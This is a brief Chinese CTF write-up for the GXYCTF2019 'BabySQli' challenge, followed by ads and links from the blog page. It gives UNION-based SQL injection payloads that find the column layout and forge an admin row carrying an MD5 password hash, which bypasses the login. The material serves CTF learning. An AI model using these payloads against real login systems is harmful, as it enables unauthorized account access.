[GXYCTF2019]BabySQli
2.解密后是一串base64,再解码得到select * from user where username = '$name' 这个提示告诉了他只去select了username;
3.使用联合查询,发现下面的语句是正确的,可以知道数据表有三列
4.再用name=1' union select ‘admin’,2,3%23&pw=1来一个个位判断,admin在2位
5.直接name=1' union select 1,‘admin’,3%23&pw=1,怎么尝试都是wrong pass,查看题目给的源码可得,密码被进行了MD5加密
6.可以用联合查询的技巧:在联合查询并不存在的数据时,联合查询就会构造一个 虚拟的数据
于是构造一下语句,使虚拟数据混淆admin密码,得到答案
1' union select 1,'admin','202cb962ac59075b964b07152d234b70'%23&pw=123 前面字符串是123的MD5加密
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 阿里最新开源QwQ-32B,效果媲美deepseek-r1满血版,部署成本又又又降低了!
· 开源Multi-agent AI智能体框架aevatar.ai,欢迎大家贡献代码
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· AI技术革命,工作效率10个最佳AI工具